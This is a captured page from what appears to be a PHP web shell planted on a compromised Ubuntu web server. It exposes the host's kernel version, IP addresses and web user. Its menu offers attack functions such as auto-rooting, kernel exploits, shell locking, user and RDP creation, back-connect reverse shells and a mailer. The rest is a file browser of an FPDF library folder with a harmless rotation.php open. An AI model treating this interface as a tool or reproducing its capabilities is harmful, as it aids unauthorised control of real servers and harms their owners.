Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.143.239.63
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
gcg /
tarka_pdf_latest /
[ HOME SHELL ]
Name
Size
Permission
Action
doc
[ DIR ]
drwxr-xr-x
font
[ DIR ]
drwxr-xr-x
fpdi
[ DIR ]
drwxr-xr-x
tutorial
[ DIR ]
drwxr-xr-x
FAQ.htm
13.95
KB
-rwxr-xr-x
fpdf.css
1.29
KB
-rwxr-xr-x
fpdf.php
42.51
KB
-rwxr-xr-x
histo.htm
6.6
KB
-rwxr-xr-x
install.txt
983
B
-rwxr-xr-x
license.txt
326
B
-rwxr-xr-x
rotation.php
588
B
-rwxr-xr-x
sample.pdf
1.08
KB
-rwxr-xr-x
sample.php
155
B
-rwxr-xr-x
setpdfPWD.php
726
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rotation.php
<?php require('fpdf.php'); class PDF_Rotate extends FPDF { var $angle=0; function Rotate($angle,$x=-1,$y=-1) { if($x==-1) $x=$this->x; if($y==-1) $y=$this->y; if($this->angle!=0) $this->_out('Q'); $this->angle=$angle; if($angle!=0) { $angle*=M_PI/180; $c=cos($angle); $s=sin($angle); $cx=$x*$this->k; $cy=($this->h-$y)*$this->k; $this->_out(sprintf('q %.5F %.5F %.5F %.5F %.2F %.2F cm 1 0 0 1 %.2F %.2F cm',$c,$s,-$s,$c,$cx,$cy,-$cx,-$cy)); } } function _endpage() { if($this->angle!=0) { $this->angle=0; $this->_out('Q'); } parent::_endpage(); } } ?>
Close